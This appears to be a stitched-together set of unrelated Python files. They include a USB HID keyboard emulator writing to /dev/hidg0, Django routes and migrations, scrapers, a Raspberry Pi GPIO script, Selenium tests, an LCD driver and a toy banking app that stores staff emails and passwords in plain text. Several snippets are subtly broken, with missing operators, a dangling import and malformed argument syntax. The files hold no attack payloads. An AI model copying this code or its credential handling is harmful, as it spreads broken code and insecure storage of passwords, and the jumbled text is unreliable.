"0x%x" % iModNone, False), ',' : ("0x36", "0x%x" % iModNone, False), '/' : ("0x24", "0x%x" % iModLShift, False), ':' : ("0x37", "0x%x" % iModLShift, False), ';' : ("0x36", "0x%x" % iModLShift, False), '<' : ("0x64", "0x%x" % iModNone, False), '=' : ("0x27", "0x%x" % iModLShift, False), '>' : ("0x64", "0x%x" % iModLShift, False), '?' : ("0x2d", "0x%x" % iModLShift, False), '@' : ("0x14", "0x%x" % iModRSuper, False), '[' : ("0x25", "0x%x" % iModRSuper, False), '\\' : ("0x2d", "0x%x" % iModRSuper, False), ']' : ("0x26", "0x%x" % iModRSuper, False), '^' : ("0x35", "0x%x" % iModNone, True), '_' : ("0x38", "0x%x" % iModLShift, False), '`' : ("0x2e", "0x%x" % iModLShift, True), '{' : ("0x2f", "0x%x" % iModRSuper, False), '\|' : ("0x64", "0x%x" % iModRSuper, False), '}' : ("0x27", "0x%x" % iModRSuper, False), '~' : ("0x30", "0x%x" % iModRSuper, False), '\t' : ("0x2b", "0x%x" % iModNone, False), '\n' : ("0x28", "0x%x" % iModNone, False), 'µ' : ("0x10", "0x%x" % iModRSuper, False), '°' : ("0x35", "0x%x" % iModLShift, False), '§' : ("0x20", "0x%x" % iModLShift, False), 'ä' : ("0x34", "0x%x" % iModNone, False), 'Ä' : ("0x34", "0x%x" % iModLShift, False), 'ö' : ("0x33", "0x%x" % iModNone, False), 'Ö' : ("0x33", "0x%x" % iModLShift, False), 'ü' : ("0x2f", "0x%x" % iModNone, False), 'Ü' : ("0x2f", "0x%x" % iModLShift, False), 'ß' : ("0x2d", "0x%x" % iModNone, False), '€' : ("0x08", "0x%x" % iModRSuper, False), } SpecialKeys = { 'ESC' : "0x29", 'BACKSPACE' : "0x2a", 'CAPSLOCK' : "0x39", 'F1' : "0x3a", 'F2' : "0x3b", 'F3' : "0x3c", 'F4' : "0x3d", 'F5' : "0x3e", 'F6' : "0x3f", 'F7' : "0x40", 'F8' : "0x41", 'F9' : "0x42", 'F10' : "0x43", 'F11' : "0x44", 'F12' : "0x45", 'PRINTSCREEN' : "0x46", 'SCROLLLOCK' : "0x47", 'PAUSE' : "0x48", 'INSERT' : "0x49", 'HOME' : "0x4a", 'PAGEUP' : "0x4b", 'DELETE' : "0x4c", 'END' : "0x4d", 'PAGEDOWN' : "0x4e", 'RIGHTARROW' : "0x4f", 'LEFTARROW' : "0x50", 'DOWNARROW' : "0x51", 'UPARROW' : "0x52", } KeypadKeys = { 'NUMLOCK' : "0x53", '/' : "0x54", '' : "0x55", '-' : "0x56", '+' : "0x57", 'ENTER' : "0x58", '1' : "0x59", '2' : "0x5a", '3' : "0x5b", '4' : "0x5c", '5' : "0x5d", '6' : "0x5e", '7' : "0x5f", '8' : "0x60", '9' : "0x61", '0' : "0x62", '.' : "0x63", '=' : "0x67", } # print(Printables["de_DE"]) class KeycodeSender: def __init__(self, locale = "de_DE", device = r"/dev/hidg0"): self.PrintableKeys = Printables[locale] self.SpecialKeys = SpecialKeys self.KeypadKeys = KeypadKeys self.Device = device def sendPrintable(self, key, ModShift = False, ModCtrl = False, ModAlt = False, ModSuper = False, ModWin = False): KeyCode, ModCode, Dead = self.PrintableKeys[key] ModCode = "0x%x" % (int(ModCode,0) \| iModLShift if ModShift else 0 \| iModLCtrl if ModCtrl else 0 \| iModLAlt if ModAlt else 0 \| iModRSuper if ModSuper else 0 \| iModLWin if ModWin else 0) Sequence = bytes(int(x,0) for x in [ModCode, bNull, KeyCode, bNull, bNull, bNull, bNull, bNull]) with open(self.Device, 'wb') as fp: fp.write(Sequence) fp.write(bReleaseAll) if Dead: fp.write(Sequence) fp.write(bReleaseAll) def sendKeypadKey(self, key, ModShift = False, ModCtrl = False, ModAlt = False, ModSuper = False, ModWin = False): ModCode = "0x%x" % (iModLShift if ModShift else 0 \| iModLCtrl if ModCtrl else 0 \| iModLAlt if ModAlt else 0 \| iModRSuper if ModSuper else 0 \| iModLWin if ModWin else 0) Sequence = bytes(int(x,0) for x in [ModCode, bNull, self.KeypadKeys[key], bNull, bNull, bNull, bNull, bNull]) with open(self.Device, 'wb') as fp: fp.write(Sequence) fp.write(bReleaseAll) def sendSpecialKey(self, key, ModShift = False, ModCtrl = False, ModAlt = False, ModSuper = False, ModWin = False): KeyCode = self.SpecialKeys[key] ModCode = "0x%x" % (iModLShift if ModShift else 0 \| iModLCtrl if ModCtrl else 0 \| iModLAlt if ModAlt else 0 \| iModRSuper if ModSuper else 0 \| iModLWin if ModWin else 0) Sequence = bytes(int(x,0) for x in [ModCode, bNull, KeyCode, bNull, bNull, bNull, bNull, bNull]) with open(self.Device, 'wb') as fp: fp.write(Sequence) fp.write(bReleaseAll) # de_Keyboard = KeycodeSender() # de_Keyboard.sendPrintable('-', ModCtrl = True) # de_Keyboard.sendKeypadKey('0') # de_Keyboard.sendSpecialKey('F1', ModShift = False) # print(de_Keyboard)
"""config URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from balance import views as balance_views urlpatterns = [ path('admin/', admin.site.urls), # URL 이 balance인 경우 애플리케이션 뷰의 main_view() 함수로 매핑된다. path('info/balance/', balance_views.main_view2), path('info/', balance_views.main_info), path('', balance_views.info), path('login/', balance_views.login), path('login/sign/', balance_views.sign_in), path('login/sign/aa/', balance_views.insert_info) # path() ]
try: from private import * except: import getpass uri = 'ldap://localhost' dc = 'dc=domain,dc=com' user_dn = 'cn=admin,' + dc user_pw = getpass.getpass("Password for %s:" % user_dn)
n = 0 while n**3 <12000: n += 1 print(n-1)
project_path = '/home/parkhi/Desktop/DIP_project' video_resource = project_path+'/data/' frame_resource = project_path+'/data/' # Any resource/pickles can be stored here. model_resource = project_path+"/data/models/"
#!/usr/bin/python import ConfigParser from morsegenerator import MorseGenerator from voicesynthetizer import Synthetizer nato = {'A': 'alfa', 'B': 'bravo', 'C': 'charli', 'D': 'delta', 'E': 'eco', 'F': 'foxtrot', 'G': 'golf', 'H': 'hotel', 'I': 'india', 'J': 'yuliet', 'K': 'kilo', 'L': 'lima', 'M': 'maik', 'N': 'november','O': 'oscar', 'P': 'papa', 'Q': 'quebec', 'R': 'romeo', 'S': 'sierra', 'T': 'tango', 'U': 'union', 'V': 'victor', 'W': 'wiski', 'X': 'exrey', 'Y': 'yanqui', 'Z': 'zulu', } class MorseTeacher: def __init__(self): self.hi = "" self.configuration() self.character = "" self.speaker = Synthetizer("festival", "spanish") self.morse = MorseGenerator() def configuration(self): self.conf = ConfigParser.ConfigParser() self.path = "configuration/configuration.morseteacher" self.conf.read(self.path) def natodecode(self, character): return nato[character.upper()] def welcome(self, section): welcome = section + 'welcome' print self.conf.get(section, welcome) self.speaker.speechit(self.conf.get(section, welcome)) def basic(self): topic = self.conf.get("basic", "basict2") #self.speaker.speechit(topic) for s in self.conf.get("basic", "basicq2"): print s de=self.natodecode(s) print de self.speaker.speechit(de) #self.speaker.speechit(s) #self.speaker.speechit(topic + " " + s + " en codigo morse es") #self.speaker.speechit(self.morse.natodecode(s)) #self.morse.generate(s) if __name__ == '__main__': mymorse = MorseTeacher() #mymorse.welcome("general") #mymorse.welcome("basic") mymorse.basic() #testg = MorseGenerator() #testg.generate("hola amor")
from Products.CMFPlone.CatalogTool import CatalogTool from collective.rooter.navroot import getNavigationRoot # Make portal_catalog's search function use a navigation root if no path # parameter is given CatalogTool._oldSearchResults = CatalogTool.searchResults def searchResults(self, REQUEST=None, kw): if 'UID' not in kw\ and 'path' not in kw\ and (REQUEST is None or 'path' not in REQUEST): # Root catalog searches to the navigation root, except if path or UID # are explicitly given. root = getNavigationRoot() if root is not None: kw = kw.copy() kw['path'] = '/'.join(root.getPhysicalPath()) return CatalogTool._oldSearchResults(self, REQUEST, kw)
# import library that allows us to pull data from websites import requests # source 1 # requests data from url below request = requests.get('https://www.adl.org/hate-symbols') content = request.content # imports library that allows for us to pick what parts of the content to pull from bs4 import BeautifulSoup # stores all of the site's content soup = BeautifulSoup(content) # filters soup to only display what is specified specificData = soup.find_all('img') # finds and prints alternative text for images at above url for x in specificData: print(x['alt']) # source 2 # requests data from url below request = requests.get('https://archive.attn.com/stories/7307/common-expressions-words-that-are-sexist') content = request.content # imports library that allows for us to pick what parts of the content to pull from bs4 import BeautifulSoup # stores all of the site's content soup = BeautifulSoup(content) # filters soup to only display what is specified specificData = soup.find_all('h2') # finds and prints text from chart at above url for z in specificData: print(z.find(text=True)[3:])
import sys sys.setrecursionlimit(100000) n, m, root = map(int, sys.stdin.readline().split(' ')) children = [[] for ix in range(n)] cs = [] for ix in range(n - 1): h, t = map(lambda x: int(x) - 1, sys.stdin.readline().split(' ')) children[h].append(t) children[t].append(h) for ix in range(n): c = int(sys.stdin.readline()) cs.append(c) cns = [None for ix in range(n)] #def bt(n, visited = set()): # r = set([cs[n]]) # visited.add(n) # for cix in children[n]: # if cix not in visited: # r.update(bt(cix, visited)) # cns[n] = len(r) # return r def bt(n): fr = [(n, True, None, None)] visited = set() r = set() while len(fr) > 0: n, f, p, s = fr.pop() if f: r = set() visited.add(n) lst = [] for cix in children[n]: if cix not in visited: lst.append(cix) fr.append((n, False, lst, set([cs[n]]))) else: if len(p) == 0: s.update(r) cns[n] = len(s) r = s else: ix = p.pop() s.update(r) fr.append((n, False, p, s)) fr.append((ix, True, None, None)) bt(root - 1) for ix in range(m): q = int(sys.stdin.readline()) - 1 print cns[q]
import argparse import tensorflow as tf import tensorflow.keras as keras import mnist import special import tensorflow.keras.backend as K import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib.animation import FuncAnimation import os from os.path import join as pjoin #%% if __name__ == '__main__': parser = argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter ) parser.add_argument( "--model", action="store", dest="model", help="path to the saved model" ) parser.add_argument( "--output_folder", action="store", dest="output_folder", help="path to the output folder" ) parser.add_argument( "--num_bits", action="store", dest="num_bits", type=int,default=25, help="Number of bits to generate" ) parser.add_argument( "--num_images", action="store", dest="num_images", type=int,default=24, help="Number of images to generate (uses the first num_images of the test set)" ) args = parser.parse_args() output_f = args.output_folder os.makedirs(output_f,exist_ok=True) num_bits = args.num_bits num_images = 32 full_model = keras.models.load_model(args.model,compile=False, custom_objects=special.custom_objs) encoder = full_model.get_layer('encoder') latent = full_model.get_layer('latent_params') latent_sampler = full_model.get_layer('geosampler') decoder = full_model.get_layer('decoder') x_train,x_test,_,_ = mnist.get_data() input_data = x_test[:num_images] encoder_out = encoder.predict(input_data) latent_params = latent.predict(encoder_out) latent_out = latent_sampler.predict(latent_params) # decoded_latent = decoder.predict(latent_out) def predict_partial(num_bits): masked_vals = latent_out.copy() masked_vals[:,num_bits:] = 0 return decoder.predict(masked_vals) results_list = [] for bit_num in range(1,num_bits+1): results_list.append(predict_partial(bit_num)[...,0]) for image_num in range(num_images): fig, ax = plt.subplots() ims = [] for frame_idx,frame in enumerate(results_list): im = plt.imshow(frame[image_num], animated=True) title = latent_out[image_num,:frame_idx+1].copy() title[title==-1] = 0 title = ''.join([str(x) for x in np.uint8(title).tolist()]) title = ax.text(0.5,1.05,title, size=plt.rcParams["axes.titlesize"], ha="center", transform=ax.transAxes, ) ims.append([im,title]) ani = animation.ArtistAnimation(fig, ims, interval=500, blit=False, repeat_delay=1000) ani.save(pjoin(output_f,'idx_'+str(image_num)+'.gif'),writer='imagemagick') plt.close()
from bs4 import BeautifulSoup import urlparse import requests class Extract_links(object): unvisited_for_current_link=[] #this list is used to store all the unvisited links in this class then will be merged with main unvisited list def __init__(self,get_soup, visited, old_unvisited_links, url): self.get_soup = get_soup self.visited = visited self.url = url self.old_unvisited_links = old_unvisited_links def fetch_links(self): for link in self.get_soup.find_all("a"): #looks for links with <a> in that link new_tag=urlparse.urljoin(self.url,link.get("href")) #link.get() is used to take the href info of the link and then url join is used to join it to the prefix of the "url" in case it don't have it if self.url in new_tag and new_tag not in self.visited: link=[new_tag] #makes the new_tag a list called link if new_tag not in self.unvisited_for_current_link and new_tag not in self.old_unvisited_links: #this condition avoids repetitions self.unvisited_for_current_link = self.unvisited_for_current_link + link # to merge all the unvisited links together return self.unvisited_for_current_link
# Imports import os import numpy as np import argparse import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt from cosmo_utils.helpers import yyyymmddhhmmss_strtotime, make_timelist, \ yyyymmddhhmmss from datetime import timedelta # Arguments parser = argparse.ArgumentParser(description = 'Process input') parser.add_argument('--expid', metavar = 'expid', type=str, nargs = '+') parser.add_argument('--date_ini', metavar = 'date_ini', type=str, default = '20160525000000') parser.add_argument('--date_end', metavar = 'date_end', type=str, default = '20160610000000') parser.add_argument('--date', metavar = 'date', type=str, nargs = '+') parser.add_argument('--time', metavar = 'time', type=str, nargs = '+') args = parser.parse_args() exptag = '' for exp in args.expid: exptag += exp + '_' exptag = exptag[:-1] savedir = '/e/uwork/extsrasp/save/' + exptag + '/prec_time/' plotdir = '/e/uwork/extsrasp/plots/' + exptag + '/prec_time/' if not os.path.exists(plotdir): os.makedirs(plotdir) # Loop over time tstart = yyyymmddhhmmss_strtotime(args.date_ini) tend = yyyymmddhhmmss_strtotime(args.date_end) tint = timedelta(days=1) if tstart == tend: timelist = [tstart] else: timelist = make_timelist(tstart, tend, tint) matlist = [] for t in timelist: savefn = savedir + yyyymmddhhmmss(t) + '_' + str(args.time[0]) + '_' + str(args.time[1]) tplot, savemat, labelslist = np.load(savefn + '.npy') matlist.append(savemat) cdict = {'radar':'k', 'REF':'b', 'REF_TL500':'green', 'PSP_TL500':'r', #'sig1':'green', #'time20':'orange', #'time10':'orange', #'const3':'purple', #'const1':'purple', #'nolowest':'gray', #'ref_tl500':'lightblue', #'std2_tl500':'darkblue', } lwdict = {'radar':2, 'REF':2, 'REF_TL500':2, 'PSP_TL500':2, #'sig1':1.5, #'time20':1.5, #'time10':1.5, #'const3':1.5, #'const1':1.5, #'nolowest':1.5, #'ref_tl500':1.5, #'std2_tl500':1.5, } lsdict = {'radar':'-', 'REF':'-', 'REF_TL500':'-', 'PSP_TL500':'-', #'sig1':'--', #'time20':'-', #'time10':'--', #'const3':'-', #'const1':'--', #'nolowest':'-', #'ref_tl500':'-', #'std2_tl500':'-', } savemat = np.mean(matlist, axis = 0) fig, ax = plt.subplots(1, 1, figsize = (6, 4)) for i in range(savemat.shape[1]): l = labelslist[i] ax.plot(tplot, savemat[:,i], c = cdict[l], label = l, linewidth = lwdict[l], linestyle = lsdict[l]) ax.legend(loc = 2, fontsize = 6) ax.set_xlabel('time [UTC]') ax.set_ylabel('di prec [mm/h]') ax.set_title(args.date_ini + '_' + args.date_end) plt.tight_layout() plotstr = (args.date_ini + '_' + args.date_end + '_' + str(args.time[0]) + '_' + str(args.time[1])) print 'Saving as ', plotdir + plotstr plt.savefig(plotdir + plotstr, dpi = 150) plt.close('all')
import RPi.GPIO as GPIO import time GPIO.setmode(GPIO.BOARD) GPIO.setup(11,GPIO.OUT) #set pin 11 as out GPIO.setup(13,GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 13 as input def Button (channel): #this function will be called when the button is pressed GPIO.output(11,1) #Turn ON the LED GPIO.add_event_detect(13, GPIO.FALLING,callback= Button,bouncetime=200) #interupt that will call the button function try: while 1: if (GPIO.input(13)==1): # this check if the switch is is not pressed GPIO.output(11,0) # and if the switch is not pressed this part switches Led OFF except KeyboardInterrupt: GPIO.remove_event_detect(13) GPIO.cleanup()
try: i=int(input()) except Exception as e: print(e) else: print("every thing is good") finally: print("the entered number is")
# -- coding: utf-8 -- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('polls', '0002_auto_20150314_0215'), ] operations = [ migrations.DeleteModel( name='Accolades', ), migrations.RenameField( model_name='incident', old_name='incident_text', new_name='name', ), migrations.RenameField( model_name='update', old_name='update', new_name='incident', ), migrations.RemoveField( model_name='incident', name='players', ), migrations.DeleteModel( name='Player', ), migrations.RemoveField( model_name='incident', name='title', ), migrations.AddField( model_name='incident', name='crime', field=models.TextField(default='x'), preserve_default=False, ), migrations.AddField( model_name='update', name='headline', field=models.CharField(default='x', max_length=200), preserve_default=False, ), migrations.AddField( model_name='update', name='update_text', field=models.TextField(default='x'), preserve_default=False, ), ]
import sys from numpy import * from matplotlib import pyplot as plt #xvar = array([1,2,3,4,5]) #yvar = xvar*2 xvar, yvar = loadtxt("../data/data.csv", unpack=True, delimiter=',') plt.clf() plt.plot(xvar,yvar,'rx') plt.plot(xvar,yvar,'b') plt.xlim((0,6)) plt.ylim((0,12)) plt.xlabel("My X Variable") plt.ylabel("My Y Variable") plt.title("My First Python Plot") plt.savefig("../fig/fig_first_plot.png") plt.show()
def urai(word): huruf = '' #list kosong untuk menampung hasil looping 1 char_2 = '' #list kosong untuk menampung hasil looping 2 for i in range(1,len(word)+1): #untuk looping pertama huruf = huruf + word[0:i] for j in range(len(word)-1): #untuk looping kedua char_2 = char_2 + word[j:] return huruf + char_2 print(urai('Code')) print(urai('Python'))
import time import pytest from .pages.product_page import BookOrderPage from .pages.basket_page import BasketPage from .pages.login_page import LoginPage links = ["http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer0"] @pytest.mark.need_review @pytest.mark.parametrize('link', links) def test_guest_can_add_product_to_basket(browser, link): page = BookOrderPage(browser, link) page.open() title = page.get_product_title() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_be_at_messages(title) def test_guest_should_see_login_link_on_product_page(browser): link = "http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/" page = BookOrderPage(browser, link) page.open() page.should_be_login_link() @pytest.mark.need_review def test_guest_can_go_to_login_page_from_product_page(browser): link = "http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/" page = BookOrderPage(browser, link) page.open() page.go_to_login_page() login_page = LoginPage(browser, browser.current_url) login_page.should_be_login_page() @pytest.mark.skip @pytest.mark.parametrize('link', links) def test_guest_cant_see_success_message_after_adding_product_to_basket(browser, link): page = BookOrderPage(browser, link) page.open() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_not_be_at_messages() @pytest.mark.skip @pytest.mark.parametrize('link', links) def test_message_disappeared_after_adding_product_to_basket(browser, link): page = BookOrderPage(browser, link) page.open() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_be_disappeared_messages() @pytest.mark.need_review @pytest.mark.parametrize('link', links) def test_guest_cant_see_product_in_basket_opened_from_product_page(browser, link): page = BookOrderPage(browser, link) page.open() page.go_to_basket_page() basket_page = BasketPage(browser, browser.current_url) basket_page.should_be_empty_basket() basket_page.should_be_empty_msg() @pytest.mark.parametrize('link', links) class TestUserAddToBasketFromProductPage: @pytest.fixture(autouse=True) def setup(self, browser, link): page = BookOrderPage(browser, link) page.open() page.go_to_login_page() login_page = LoginPage(browser, browser.current_url) email = f"{str(time.time())}@fakemail.org" login_page.register_new_user(email=email, password="Siber!550") login_page.should_be_authorized_user() def test_user_cant_see_success_message(self, browser, link): page = BookOrderPage(browser, link) page.open() page.should_not_be_at_messages() @pytest.mark.need_review def test_user_can_add_product_to_basket(self, browser, link): page = BookOrderPage(browser, link) page.open() title = page.get_product_title() page.should_be_add_to_basket_btn() page.add_to_basket() page.solve_quiz_and_get_code() page.should_be_at_messages(title)
import asyncio from django.core.management import BaseCommand from backend.user_service.user.infra.adapter.user_create_command_handler \ import UserCreateCommandHandler from backend.user_service.user.infra.adapter.user_point_update_command_handler \ import UserPointUpdateCommandHandler from backend.user_service.user.infra.adapter.user_login_event_handler \ import UserLoginEventHandler from backend.user_service.user.infra.adapter.user_logout_event_handler \ import UserLogoutEventHandler from backend.user_service.user.app.user_application_service \ import UserApplicationService from backend.common.messaging.infra.redis.redis_message_subscriber \ import RedisMessageSubscriber from backend.common.command.user_create_command \ import USER_CREATE_COMMAND from backend.common.command.user_point_update_command \ import USER_POINT_UPDATE_COMMAND from backend.common.event.user_login_event \ import USER_LOGIN_EVENT from backend.common.event.user_logout_event \ import USER_LOGOUT_EVENT from backend.common.rpc.infra.adapter.redis.redis_rpc_server \ import RedisRpcServer from backend.common.utils.signal_handler \ import register_signal_handler, shutdown_process class Command(BaseCommand): user_application_service = UserApplicationService() user_point_update_command_handler = UserPointUpdateCommandHandler( user_application_service=user_application_service) user_create_command_handler = UserCreateCommandHandler( user_application_service=user_application_service) user_login_event_handler = UserLoginEventHandler( user_application_service=user_application_service) user_logout_event_handler = UserLogoutEventHandler( user_application_service=user_application_service ) subscriber = RedisMessageSubscriber() rpc_server = RedisRpcServer() def handle(self, args, *options): loop = asyncio.get_event_loop() register_signal_handler(loop, shutdown_process) async def main(): """ create subscription tasks """ user_create_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_CREATE_COMMAND, message_handler=self.user_create_command_handler)) user_create_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_CREATE_COMMAND, request_handler=self.user_create_command_handler)) user_point_update_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_POINT_UPDATE_COMMAND, message_handler=self.user_point_update_command_handler)) user_point_update_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_POINT_UPDATE_COMMAND, request_handler=self.user_point_update_command_handler)) user_login_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_LOGIN_EVENT, message_handler=self.user_login_event_handler)) user_login_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_LOGIN_EVENT, request_handler=self.user_login_event_handler)) user_logout_subscription_task = asyncio.create_task( self.subscriber.subscribe_message( topic=USER_LOGOUT_EVENT, message_handler=self.user_logout_event_handler)) user_logout_rpc_task = asyncio.create_task( self.rpc_server.register_handler( topic=USER_LOGOUT_EVENT, request_handler=self.user_logout_event_handler)) """ wait until application stop """ await asyncio.gather( user_create_subscription_task, user_create_rpc_task, user_point_update_subscription_task, user_point_update_rpc_task, user_login_subscription_task, user_login_rpc_task, user_logout_subscription_task, user_logout_rpc_task, ) loop.create_task(main()) loop.run_forever()
# -- coding:UTF-8 -- u''' ****************************************************************************** * 文件：GDC03849.py * 概述：ht1621x芯片驱动GDC03849段式液晶的程序,显示范围-99.99-999.99 * 版本：V0.10 * 作者：Robin Chen * 日期：2018年5月9日 * 历史：日期编辑版本记录 2018年5月9日 Robin Chen V0.10 创建文件 *****************************************************************************''' from PYBNano.DisplayModule.LCD.HT1621B.ht1621x import # 16进制湿度字库(0~9,包含湿度文字、小数点及湿度单位显示) NUMCODE_RH_HEX = ((0x0D,0x0F),\ (0x08,0x06),\ (0x0B,0x0D),\ (0x0A,0x0F),\ (0x0E,0x06),\ (0x0E,0x0B),\ (0x0F,0x0B),\ (0x08,0x0E),\ (0x0F,0x0F),\ (0x0E,0x0F)) # 16进制温度字库(0~9,包含温度文字、小数点及温度单位显示) NUMCODE_TEMP_HEX = ((0x0F,0x0D),\ (0x06,0x08),\ (0x0B,0x0E),\ (0x0F,0x0A),\ (0x06,0x0B),\ (0x0D,0x0B),\ (0x0D,0x0F),\ (0x07,0x08),\ (0x0F,0x0F),\ (0x0F,0x0B)) u'''************************************************************************* * 功能：显示温度值 * 说明：将进制制浮点数温度值以两位小数的形式显示出来 * 输入参数： data: 测量到的温度值 \| flot \| de \| 000.00~999.99 \| eg. 24.543 * 输出参数：None * 返回值：True *************************************************************************''' def viewTemp(data): val = () stda= ('00000' + str(int(data100)))[-5::] stda=list(stda)[::-1] for i in stda: val=val + NUMCODE_TEMP_HEX[int(i)] HT1621xWrAllData(0x0A, val) return True u'''************************************************************************* * 功能：显示湿度值 * 说明：将进制制浮点数湿度值以两位小数的形式显示出来 * 输入参数： data: 测量到的湿度值 \| flot \| de \| 000.00~999.99 \| eg. 24.543 * 输出参数：None * 返回值：True *************************************************************************''' def viewRH(data): val=() stda= ('00000' + str(int(data100)))[-5::] for i in stda: val=val + NUMCODE_RH_HEX[int(i)] HT1621xWrAllData(0x00, val) return True u'''************************************************************************* * 功能：显示所有显示字段 * 说明： * 输入参数：NONE * 输出参数：None * 返回值：True ************************************************************************''' def LCDALLSHOW(): ALLSHOW(0x00,20) return True u'''*********************************************************************** * 功能：清除屏幕全部显示 * 说明： * 输入参数：None * 输出参数：None * 返回值：True ************************************************************************''' def LCDALLCLEAR(): ALLCLEAR(0x00,20) return True u'''*********************************************************************** * 功能：清除屏幕温度区域显示 * 说明： * 输入参数：None * 输出参数：None * 返回值：True ************************************************************************''' def TEMPCLEAR(): ALLCLEAR(0x0A,10) return True u'''*********************************************************************** * 功能：清除屏幕湿度区显示 * 说明： * 输入参数：None * 输出参数：None * 返回值：True **************************************************************************''' def RHCLEAR(): ALLCLEAR(0x00, 10) return True #初始化LCD lcdinit() LCDALLSHOW() sleep(1) LCDALLCLEAR()
import time from ops import * #from utils import * def network( x,training,res_n=10, reuse=False): """ Args: x: the input of the network,a tensor of size [batch_size, height,width,channel] training: if training res_n: the number of the blocks to use for each layer Returns: the output of each layer(conv1,conv2,conv3,conv4,conv5) """ with tf.variable_scope("network", reuse=reuse): if res_n < 50: residual_block = resblock else: residual_block = bottle_resblock residual_list = get_residual_layer(res_n) ch = 64 # paper is 64 x = conv(x, ch,training,name='block/conv0',kernel=7, stride=2, scope='conv') conv1 = relu(x) print(conv1) print(x) x=pool('maxpooling', x, ksize=None, stride=None, is_max_pool=True) ######################################################################################################## x = residual_block(x, ch ,training,first=True, downsample=False, scope='resblock0_0') print(x) for i in range(1,residual_list[0]): x = residual_block(x,ch, training, downsample=False, scope='resblock0_' + str(i)) print(x) conv2 = relu(x) print(conv2) ######################################################################################################## x = residual_block(x, ch * 2,training,first=True, downsample=True, scope='resblock1_0') print(x) for i in range(1, residual_list[1]): x = residual_block(x, ch * 2, training, downsample=False, scope='resblock1_' + str(i)) print(x) conv3 =relu(x) print(conv3) ######################################################################################################## x = residual_block(x, ch * 4,training,first=True, downsample=True, scope='resblock2_0') print(x) for i in range(1, residual_list[2]): x = residual_block(x,ch * 4, training, downsample=False, scope='resblock2_' + str(i)) print(x) conv4 =relu(x) print(conv4) ######################################################################################################## x = residual_block(x,ch * 8,training,first=True, downsample=True, scope='resblock3_0') print(x) for i in range(1,residual_list[3]): x = residual_block(x, ch * 8, training, downsample=False, scope='resblock_3_' + str(i)) print(x) conv5 =relu(x) print(conv5) ######################################################################################################## return conv1,conv2,conv3,conv4,conv5
import pyqrcode import png from datetime import date def barcodeGenerator(order_id, event_name, ref_code, order_uuid, user_order): today_date = date.today() order_details = "AFRIVENT \ \n ORDER {0} CONFIRMED For {1}, \ \n Payment ID: {2} \ \n Unique Order Id: {3} \ \n Ordered By: {4} On {5}".format(order_id, event_name, ref_code, order_uuid, user_order, today_date ) url = pyqrcode.create(order_details) image_as_str = url.png_as_base64_str(scale=5) image_as_str = "data:image/png;base64,{}".format(image_as_str) # url.png('{}.png'.format(order_id), scale=4) print("Printing QR code") # print(url.terminal(quiet_zone=1)) return image_as_str
# username = input('Your username ') # Email = input('your email ') # password = input('choose a suitable password ') # fullname = input('what is your fullname? ') f = open("staff.txt",'w') staffDetails = str("1." )+str("Tara, Taradebby@gmail.com, Taradee, Omotara Kuds \n") f.write(staffDetails) f = open("staff.txt",'a') staffDetails2 = str("2. " )+str("korede, korede419@gmail.com, smarter, Korede Ibukunoluwa") f.write(staffDetails2) f.close() f = open("customer.txt", "w") print("Welcome to the SN Banking App \n ") Login = input("To LOGIN type-> login" + "\n" +"To CLOSE type-> close \n") # print("To CLOSE type-> close \n") action = True while action: if Login == "login": username =input("Username: ") password =input("Password: ") checkIn = input("To CREATE NEW BANK ACCOUNT type-> new" + "\n" + "To CHECK ACCOUNT BALANCE type-> balance \n"+"To LOGOUT type-> logout \n") activity = True while activity: if checkIn == "new": account_name = input("Account Name: ") account_balance = input("Account Balance: ") account_type = input("Account Type: ") account_email = input("Account email: ") account_number = input("Account Number: ") f=open("customer.txt", "a") f.write(account_number) f.close() elif checkIn == "balance": account_number = input("What is your Account Number: ") f = open("customer.txt", "r") print(f.read()) elif checkIn == "logout": print("lets go again") breakpoint() if Login == "close": print("Thank you for using this app.") break
#coding=utf-8 import sys sys.path.append("../") from src import verbalGraphGenerator import random from src import logger import logging import uuid from src import utils from src import constants import argparse import codecs import os import time import pdb import json import regular_test sentences = regular_test.get_sentence(file_path="../doc/output") with codecs.open("../doc/output1",'w','utf-8') as f: for k,v in sentences.items(): f.write(v[0]) f.write('\t') f.write(k+"\n")
#Relational / Comparison Operators a=3 b=3 print(a==b) a=4 b=5 print(a!=b) a=2 b=6 print(a>b) a=5 b=6 print(a<b) a=6 b=7 print(a>b) a=8 b=7 print(a>b) a=3 b=4 print(a<=b) a=9 b=4 print(a<=b) a=5 b=9 print(a>b) a=5 b=9 print(a>=b) a=8 b=4 print(a>b) a=15 b=9 print(a>=b)
